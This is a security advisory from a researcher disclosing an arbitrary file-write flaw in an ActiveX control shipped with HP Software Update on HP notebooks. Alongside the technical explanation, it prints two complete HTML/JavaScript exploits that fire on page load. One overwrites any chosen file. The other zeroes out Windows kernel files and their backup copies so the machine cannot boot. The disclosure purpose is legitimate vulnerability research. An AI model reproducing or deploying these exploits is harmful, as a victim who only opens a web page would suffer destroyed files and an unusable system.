HP laptops Software Update tool vulnerability
Advisory:
/////////
There is another remotely exploitable flaw within software preinstalled in HP
notebook machines. This time, the culprit is automatic software update tool
provided by the vendor.The Potential exploitation may lead to user files loss
or altering vital system files (e.g. kernel), thus leaving PC unbootable.
Overview:
/////////
The flaw is located in the software called HP Software Update shipped with the
HP notebooks to support automatic software updates and critical vulnerability
patching. One of the ActiveX controls deployed by default by the vendor
contains an insecure method giving a potential attacker the remote system
arbitrary file write access.
Impact:
///////
Remote user files contents corruption
Remote system kernel files damage / Operating System DoS condition
Attack vectors:
///////////////
There are two main attack vector schemes:
- inducing remote user to launch WWW link after obtaining the information about
the location of an arbitrary file(s) locations/names in the remote system.
After clicking the link the files contents will be unrecoverably destroyed.
This attack vector thus requires additional social engineering of the vitim to
acquire exact name and location of the potential attack target files.
- inducing remote user to launch WWW link resulting in corruption of vital
Operating System files, leaving the system unusable. This attack vector DOESN'T
require any additional victim social engineering,
because the system files are always placed in the predictable locations.
Technical details:
//////////////////
The vulnerable ActiveX control EngineRules.dll is a component of HP Software
Updates system designed by the vendor.
It has assigned CLSID: 7CB9D4F5-C492-42A4-93B1-3F7D6946470D and is by default
included to "Safe for Scripting" OLE components, that allows full execution
scripting access to the control methods from within the browser.
The default control installation path is
C:\Program Files\Hewlett-Packard\eSupportDiags\RulesEngine.dll
The control is used by the the HP Software Updates software's HPWUCli.exe
client application to enumerate, load and store available software patches
information. The HPWUCli.exe binary is located in the directory:
C:\Program Files\HP\HP Software Update\
The control may also be used by a remote WWW service, such as Hewlett-Packard
online software update service.
The potentialy insecure method is:
void SaveToFile(String dataFilePath);
This method is used to store the software patch specific data (version, remote
location, vendor name, software description) in the binary file beginning with
the 32bit integer value containing the actual patches count stored in the data
file.
The problem lies in the lack of distinguish between local and global data file
area in this control. Both LoadDataFromFile() method and SaveDataToFile()
method have an access to the entire file system data area, therefore any
arbitrary user file can be accessed remotely using one of these methods by a
remote entity.
Use the SaveDataToFile() can be exploited to store the empty-by-initialize
software patch data in the existing file, which will result in previous file
contents loss and resetting it to 4 zero-bytes, describing a zero-size patch.
Noticing a specific vulnerability location (vendor's software update system),
simple disabling of the vulnerable control by the vendor's patch (like in the
other HP software vulnerbility case - HPInfo) would result in the machine
software update system compromise in this case and would leave the user
vulnerable to the future security issues.
Therefore reimplemetation of the update system and/or vulnerable control local
data area implementation is strongly recommended.
Remote Kernel Wreckage Exploit
//////////////////////////////
Using this flaw one can construct an armed exploit, able for example to destroy
remote system kernel files and make the remote machine UNBOOTABLE. The exploit
is using vulnerable SaveToFile() to overwrite the NT System kernel files with
the 4 zero bytes. The target are memory mapped ntoskrnl.exe and ntkrnlpa.exe
kernel files which don't have a write lock set on them and may be opened for
write. Although Windows NT system contains a protection for this kind of
activity (system files overwrite) it can be fooled by overwriting
simultanously: system binary files backup directory (\System32\DllCache\)
actual system kernel files (\System32\) and the Driver Backup directory
(\Windows\Driver Cache\)
kernel files.
After the execution it will store an zero-initialized patch information using
SaveToFile() method sequentially to ntoskrnl.exe, ntkrnlpa.exe, ntkrnlmp.exe
,ntkrpamp.exe NT kernel files , first in the System32\DllCache\ directory,
second to \System32\ directory and finally to Windows\Driver Cache\ dir. After
the very next OS shutdown, machine will not be bootable anymore.
The exploit code has been attached to the end of this advisory. NOTE however
that it is provided ONLY as a Proof of Concept code and has been released ONLY
to estimate the impact level of the issue.
Vulnerable Software:
////////////////////
HP Software Update client v3.0.8.4
RulesEngine.dll ActiveX CTL v1.0
Internet Explorer 6.0
Internet Explorer 7.0
Windows XP Home
Windows XP Pro
Windows 2000
Windows 2003
Windows Vista
Vulnerable Hardware
///////////////////
Every HP notebook machine containing the HP Software Updates application is
vulnerable. It is possible that the vulnerable machine model list disclosed by
the vendor as a confirmation to the previous issue concerning HP laptops - "HP
Info Center" case, will be similar in this case.
Exploits:
/////////
//////////////////////////////////////////
//Remote Arbitrary File Corruption Exploit
//////////////////////////////////////////
<html>
<head>
<script language="JavaScript">
var filePath="c:\\temp\\testfile.txt";
function spawn3()
{
o2obj.SaveToFile(filePath);
}
</script>
</head>
<body onload="spawn3()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D"
</object>
</body>
</html>
////////////////////////////////
//Remote Kernel Wreckage Exploit
////////////////////////////////
//
//
// WARNING! THE REAL THING...
// DON'T TRY THIS AT HOME!
// THIS WILL DAMAGE YOUR
// HP COMPUTER SYSTEM!!!
//
//
////////////////////////////////
<html>
<head>
<script language="JavaScript">
function spawn3()
{
o2obj.EvaluateRules();
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntoskrnl.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlpa.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlmp.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrpamp.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntoskrnl.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntkrnlpa.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntoskrnl.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlpa.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlmp.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrpamp.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\sp2.cab");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\driver.cab");
}
function meltdown()
{
spawn3();
spawn3();
spawn3();
}
</script>
</head>
<body onload="meltdown()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D"
</object>
</body>
</html>
Related final word:
///////////////////
Spiderpig, spiderpig, does whatever the spiderpig does...
;-)
Links:
//////
Original advisory link:
www.anspi.pl/~porkythepig/hp-issue/wyfukanyszynszyl.txt
Credits:
////////
Issue discovery and research: porkythepig
Contact: porkythepig@xxxxxxxx